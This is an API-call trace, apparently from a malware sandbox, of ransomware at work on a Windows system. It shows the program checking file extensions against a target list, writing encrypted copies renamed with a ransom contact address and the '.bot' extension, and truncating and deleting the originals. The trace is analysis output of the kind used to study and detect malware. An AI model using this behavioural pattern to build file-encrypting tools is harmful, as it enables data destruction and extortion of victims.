	[0153.794] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.794] SetEndOfFile (hFile=0x3b4) returned 1
	[0153.796] CloseHandle (hObject=0x3b4) returned 1
	[0153.796] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099187.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0153.796] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099187.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099187.jpg")) returned 1
	[0153.797] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099187.JPG") returned 63
	[0153.797] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099187.JPG") returned 63
	[0153.797] lstrlenW (lpString=".doc") returned 4
	[0153.797] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0153.797] lstrlenW (lpString=".docx") returned 5
	[0153.797] lstrcmpiW (lpString1=".docx", lpString2="7.JPG") returned -1
	[0153.797] lstrlenW (lpString=".pdf") returned 4
	[0153.797] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0153.797] lstrlenW (lpString=".xls") returned 4
	[0153.797] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0153.797] lstrlenW (lpString=".xlsx") returned 5
	[0153.797] lstrcmpiW (lpString1=".xlsx", lpString2="7.JPG") returned -1
	[0153.797] lstrlenW (lpString=".ppt") returned 4
	[0153.797] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0153.797] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099187.JPG") returned 63
	[0153.797] lstrlenW (lpString=".zip") returned 4
	[0153.797] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0153.797] lstrlenW (lpString=".rar") returned 4
	[0153.797] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0153.797] lstrlenW (lpString=".bz2") returned 4
	[0153.797] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0153.798] lstrlenW (lpString=".7z") returned 3
	[0153.798] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0153.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099187.JPG") returned 63
	[0153.798] lstrlenW (lpString=".dbf") returned 4
	[0153.798] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0153.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099187.JPG") returned 63
	[0153.798] lstrlenW (lpString=".1cd") returned 4
	[0153.798] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0153.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099187.JPG") returned 63
	[0153.798] lstrlenW (lpString=".jpg") returned 4
	[0153.798] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0153.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099187.JPG") returned 63
	[0153.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099187.JPG") returned 63
	[0153.798] lstrlenW (lpString=".doc") returned 4
	[0153.798] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0153.798] lstrlenW (lpString=".docx") returned 5
	[0153.798] lstrcmpiW (lpString1=".docx", lpString2="7.JPG") returned -1
	[0153.798] lstrlenW (lpString=".pdf") returned 4
	[0153.798] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0153.798] lstrlenW (lpString=".xls") returned 4
	[0153.798] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0153.798] lstrlenW (lpString=".xlsx") returned 5
	[0153.798] lstrcmpiW (lpString1=".xlsx", lpString2="7.JPG") returned -1
	[0153.798] lstrlenW (lpString=".ppt") returned 4
	[0153.798] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0153.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099187.JPG") returned 63
	[0153.798] lstrlenW (lpString=".zip") returned 4
	[0153.799] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0153.799] lstrlenW (lpString=".rar") returned 4
	[0153.799] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0153.799] lstrlenW (lpString=".bz2") returned 4
	[0153.799] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0153.799] lstrlenW (lpString=".7z") returned 3
	[0153.799] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0153.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099187.JPG") returned 63
	[0153.799] lstrlenW (lpString=".dbf") returned 4
	[0153.799] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0153.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099187.JPG") returned 63
	[0153.799] lstrlenW (lpString=".1cd") returned 4
	[0153.799] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0153.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099187.JPG") returned 63
	[0153.799] lstrlenW (lpString=".jpg") returned 4
	[0153.799] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0153.799] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0153.799] lstrlenW (lpString="J0099189.JPG") returned 12
	[0153.799] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099189.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099189.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0153.827] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=8076) returned 1
	[0153.827] CloseHandle (hObject=0x3b4) returned 1
	[0153.827] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099189.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099189.jpg")) returned 0x20
	[0153.828] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099189.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099189.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.839] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099189.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099189.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0153.840] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.853] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.853] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099189.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099189.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0153.858] GetLastError () returned 0x0
	[0153.859] ReadFile (in: hFile=0x3b4, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x1f8c, lpOverlapped=0x0) returned 1
	[0153.861] WriteFile (in: hFile=0x3a0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x1f90, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x1f90, lpOverlapped=0x0) returned 1
	[0153.862] ReadFile (in: hFile=0x3b4, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0153.862] WriteFile (in: hFile=0x3a0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0153.862] SetEndOfFile (hFile=0x3a0) returned 1
	[0153.863] CloseHandle (hObject=0x3a0) returned 1
	[0153.863] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.863] SetEndOfFile (hFile=0x3b4) returned 1
	[0153.865] CloseHandle (hObject=0x3b4) returned 1
	[0153.865] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099189.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0153.865] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099189.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099189.jpg")) returned 1
	[0153.867] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099189.JPG") returned 63
	[0153.867] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099189.JPG") returned 63
	[0153.867] lstrlenW (lpString=".doc") returned 4
	[0153.867] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0153.867] lstrlenW (lpString=".docx") returned 5
	[0153.867] lstrcmpiW (lpString1=".docx", lpString2="9.JPG") returned -1
	[0153.867] lstrlenW (lpString=".pdf") returned 4
	[0153.867] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0153.867] lstrlenW (lpString=".xls") returned 4
	[0153.867] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0153.867] lstrlenW (lpString=".xlsx") returned 5
	[0153.867] lstrcmpiW (lpString1=".xlsx", lpString2="9.JPG") returned -1
	[0153.867] lstrlenW (lpString=".ppt") returned 4
	[0153.868] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0153.868] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099189.JPG") returned 63
	[0153.868] lstrlenW (lpString=".zip") returned 4
	[0153.868] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0153.868] lstrlenW (lpString=".rar") returned 4
	[0153.868] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0153.868] lstrlenW (lpString=".bz2") returned 4
	[0153.868] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0153.868] lstrlenW (lpString=".7z") returned 3
	[0153.868] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0153.868] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099189.JPG") returned 63
	[0153.868] lstrlenW (lpString=".dbf") returned 4
	[0153.868] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0153.868] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099189.JPG") returned 63
	[0153.868] lstrlenW (lpString=".1cd") returned 4
	[0153.868] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0153.868] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099189.JPG") returned 63
	[0153.868] lstrlenW (lpString=".jpg") returned 4
	[0153.868] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0153.868] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099189.JPG") returned 63
	[0153.868] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099189.JPG") returned 63
	[0153.868] lstrlenW (lpString=".doc") returned 4
	[0153.868] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0153.868] lstrlenW (lpString=".docx") returned 5
	[0153.868] lstrcmpiW (lpString1=".docx", lpString2="9.JPG") returned -1
	[0153.868] lstrlenW (lpString=".pdf") returned 4
	[0153.868] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0153.868] lstrlenW (lpString=".xls") returned 4
	[0153.868] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0153.868] lstrlenW (lpString=".xlsx") returned 5
	[0153.868] lstrcmpiW (lpString1=".xlsx", lpString2="9.JPG") returned -1
	[0153.868] lstrlenW (lpString=".ppt") returned 4
	[0153.869] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0153.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099189.JPG") returned 63
	[0153.869] lstrlenW (lpString=".zip") returned 4
	[0153.869] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0153.869] lstrlenW (lpString=".rar") returned 4
	[0153.869] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0153.869] lstrlenW (lpString=".bz2") returned 4
	[0153.869] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0153.869] lstrlenW (lpString=".7z") returned 3
	[0153.869] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0153.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099189.JPG") returned 63
	[0153.869] lstrlenW (lpString=".dbf") returned 4
	[0153.869] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0153.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099189.JPG") returned 63
	[0153.869] lstrlenW (lpString=".1cd") returned 4
	[0153.869] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0153.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099189.JPG") returned 63
	[0153.869] lstrlenW (lpString=".jpg") returned 4
	[0153.869] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0153.869] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0153.869] lstrlenW (lpString="J0099193.GIF") returned 12
	[0153.869] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099193.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099193.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0153.870] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=35546) returned 1
	[0153.870] CloseHandle (hObject=0x3b4) returned 1
	[0153.870] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099193.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099193.gif")) returned 0x20
	[0153.870] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099193.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099193.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.870] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099193.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099193.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0153.871] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.871] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.871] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099193.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099193.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0153.871] GetLastError () returned 0x0
	[0153.871] ReadFile (in: hFile=0x3b4, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x8ada, lpOverlapped=0x0) returned 1
	[0153.874] WriteFile (in: hFile=0x3a0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x8ae0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x8ae0, lpOverlapped=0x0) returned 1
	[0153.875] ReadFile (in: hFile=0x3b4, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0153.875] WriteFile (in: hFile=0x3a0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0153.875] SetEndOfFile (hFile=0x3a0) returned 1
	[0153.876] CloseHandle (hObject=0x3a0) returned 1
	[0153.876] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.876] SetEndOfFile (hFile=0x3b4) returned 1
	[0153.878] CloseHandle (hObject=0x3b4) returned 1
	[0153.878] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099193.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0153.878] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099193.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099193.gif")) returned 1
	[0153.879] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099193.GIF") returned 63
	[0153.879] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099193.GIF") returned 63
	[0153.879] lstrlenW (lpString=".doc") returned 4
	[0153.879] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0153.879] lstrlenW (lpString=".docx") returned 5
	[0153.879] lstrcmpiW (lpString1=".docx", lpString2="3.GIF") returned -1
	[0153.879] lstrlenW (lpString=".pdf") returned 4
	[0153.879] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0153.879] lstrlenW (lpString=".xls") returned 4
	[0153.879] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0153.879] lstrlenW (lpString=".xlsx") returned 5
	[0153.879] lstrcmpiW (lpString1=".xlsx", lpString2="3.GIF") returned -1
	[0153.879] lstrlenW (lpString=".ppt") returned 4
	[0153.879] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0153.879] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099193.GIF") returned 63
	[0153.879] lstrlenW (lpString=".zip") returned 4
	[0153.879] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0153.879] lstrlenW (lpString=".rar") returned 4
	[0153.879] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0153.880] lstrlenW (lpString=".bz2") returned 4
	[0153.880] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0153.880] lstrlenW (lpString=".7z") returned 3
	[0153.880] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0153.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099193.GIF") returned 63
	[0153.880] lstrlenW (lpString=".dbf") returned 4
	[0153.880] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0153.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099193.GIF") returned 63
	[0153.880] lstrlenW (lpString=".1cd") returned 4
	[0153.880] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0153.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099193.GIF") returned 63
	[0153.880] lstrlenW (lpString=".jpg") returned 4
	[0153.880] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0153.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099193.GIF") returned 63
	[0153.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099193.GIF") returned 63
	[0153.880] lstrlenW (lpString=".doc") returned 4
	[0153.880] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0153.880] lstrlenW (lpString=".docx") returned 5
	[0153.880] lstrcmpiW (lpString1=".docx", lpString2="3.GIF") returned -1
	[0153.880] lstrlenW (lpString=".pdf") returned 4
	[0153.880] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0153.880] lstrlenW (lpString=".xls") returned 4
	[0153.880] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0153.880] lstrlenW (lpString=".xlsx") returned 5
	[0153.880] lstrcmpiW (lpString1=".xlsx", lpString2="3.GIF") returned -1
	[0153.880] lstrlenW (lpString=".ppt") returned 4
	[0153.880] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0153.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099193.GIF") returned 63
	[0153.880] lstrlenW (lpString=".zip") returned 4
	[0153.880] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0153.880] lstrlenW (lpString=".rar") returned 4
	[0153.880] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0153.881] lstrlenW (lpString=".bz2") returned 4
	[0153.881] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0153.881] lstrlenW (lpString=".7z") returned 3
	[0153.881] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0153.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099193.GIF") returned 63
	[0153.881] lstrlenW (lpString=".dbf") returned 4
	[0153.881] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0153.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099193.GIF") returned 63
	[0153.881] lstrlenW (lpString=".1cd") returned 4
	[0153.881] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0153.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099193.GIF") returned 63
	[0153.881] lstrlenW (lpString=".jpg") returned 4
	[0153.881] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0153.881] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0153.881] lstrlenW (lpString="J0099194.GIF") returned 12
	[0153.881] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099194.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099194.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0153.882] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=25265) returned 1
	[0153.882] CloseHandle (hObject=0x3b4) returned 1
	[0153.882] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099194.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099194.gif")) returned 0x20
	[0153.882] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099194.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099194.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.882] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099194.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099194.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0153.882] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.882] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.882] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099194.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099194.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0153.883] GetLastError () returned 0x0
	[0153.883] ReadFile (in: hFile=0x3b4, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x62b1, lpOverlapped=0x0) returned 1
	[0153.890] WriteFile (in: hFile=0x3a0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x62c0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x62c0, lpOverlapped=0x0) returned 1
	[0153.891] ReadFile (in: hFile=0x3b4, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0153.891] WriteFile (in: hFile=0x3a0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0153.891] SetEndOfFile (hFile=0x3a0) returned 1
	[0153.891] CloseHandle (hObject=0x3a0) returned 1
	[0153.892] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.892] SetEndOfFile (hFile=0x3b4) returned 1
	[0153.894] CloseHandle (hObject=0x3b4) returned 1
